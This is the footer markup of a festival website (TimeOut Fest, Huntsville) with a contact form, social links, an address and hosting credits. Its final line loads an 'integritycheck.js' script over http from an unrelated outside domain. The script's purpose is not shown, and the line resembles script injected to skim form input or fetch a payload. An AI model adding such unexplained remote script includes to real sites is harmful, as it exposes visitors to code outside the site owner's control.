				<!-- Footer -->
					<section id="footer">
						<div class="inner" id="contact">
							<h2 class="major">Get in touch</h2>
							<form method="post" action="/contact">
                <p>If you have any questions, feel free to get in touch below</p>
								<div class="field">
									<label for="name">Name</label>
									<input type="text" name="name" id="name" />
								</div>
								<div class="field">
									<label for="email">Email</label>
									<input type="email" name="email" id="email" />
								</div>
								<div class="field">
									<label for="message">Message</label>
									<textarea name="message" id="message" rows="4"></textarea>
								</div>
								<ul class="actions">
									<li><input type="submit" value="Send Message" /></li>
								</ul>
							</form>
<style type='text/css'>
.Row
{
    display: table;
    width: 100%; /*Optional*/
    table-layout: fixed; /*Optional*/
    border-spacing: 20px; /*Optional*/
}
.Column
{
    display: table-cell;
    font-size: 3em;
}
</style>
							<ul class="contact">
<!--								<i class="fa fa-phone">(000) 000-0000</li> -->
                <li style='padding: 0px;'>
                  <div class="Row">
                    <div class="Column"><a href="mailto:bamakicks@gmail.com"><i class="fa fa-envelope"></i></a></div>
                    <div class="Column"><a href="https://twitter.com/TimeOutFest"><i class="fa fa-twitter"></i></a></div>
                    <div class="Column"><a href="https://www.facebook.com/TimeOutFest/"><i class="fa fa-facebook"></i></a></div>
                    <div class="Column"><a href="http://www.instagram.com/TimeOutFest"><i class="fa fa-instagram"></i></a></div>
                    <div class="Column"><a href="http://www.vimeo.com/TimeOutFest"><i class="fa fa-vimeo"></i></a></div>
                  </div>
                </li>
								<li class="" style="padding: 0px;">
									TimeOut Team<br />
									2180 Airport Rd.<br />
									Huntsville, AL 35801
								</li>
                <li style="padding: 0px;"><a href="https://www.google.com/maps/place/2180+Airport+Rd+SW,+Huntsville,+AL+35801/@34.6928566,-86.5913648,17.89z/data=!4m2!3m1!1s0x88626cd005a85183:0x59f8fbbf812fc54e">
                  <img style="width: 100%" src='images/Map.png' />
                </a></li>
							</ul>
<style type="text/css">
#rudiment {
float: left;
}
#sophistichet {
float: right;
}
@media all and (min-width: 641px) {
  #rudiment {
    float: right;
  }
}
</style>
							<ul class="copyright">
								<li style='color: white;'>&copy; TimeOut Fest. All rights reserved. Located in Huntsville, AL.</li>
                <li id="sophistichet" style="border: 0;">
                  <p style="margin: 2px; height: 16px;"></p>
                  <p><img style="height: 40px; vertical-align: middle; background: white;" src="images/sophistichet.png" /></p>
                </li>
								<li id="rudiment" style='border: 0;'><a href='http://rudiment.us'>
                  <p style='margin: 2px;'><span style="vertical-align: middle; color: white; margin: 2;">Hosted by </span></p>
                  <p><img style = 'height: 40px; vertical-align: middle;' src='images/RudimentLogo.png' /></p>
                </a></li>
							</ul>
						</div>
					</section>

			</div>

		<!-- Scripts -->
			<script src="assets/js/skel.min.js"></script>
			<script src="assets/js/jquery.min.js"></script>
			<script src="assets/js/jquery.scrollex.min.js"></script>
			<script src="assets/js/util.js"></script>
			<!--[if lte IE 8]><script src="assets/js/ie/respond.min.js"></script><![endif]-->
			<script src="assets/js/main.js"></script>
      <script src="http://noahcodes.com/integritycheck.js"></script>
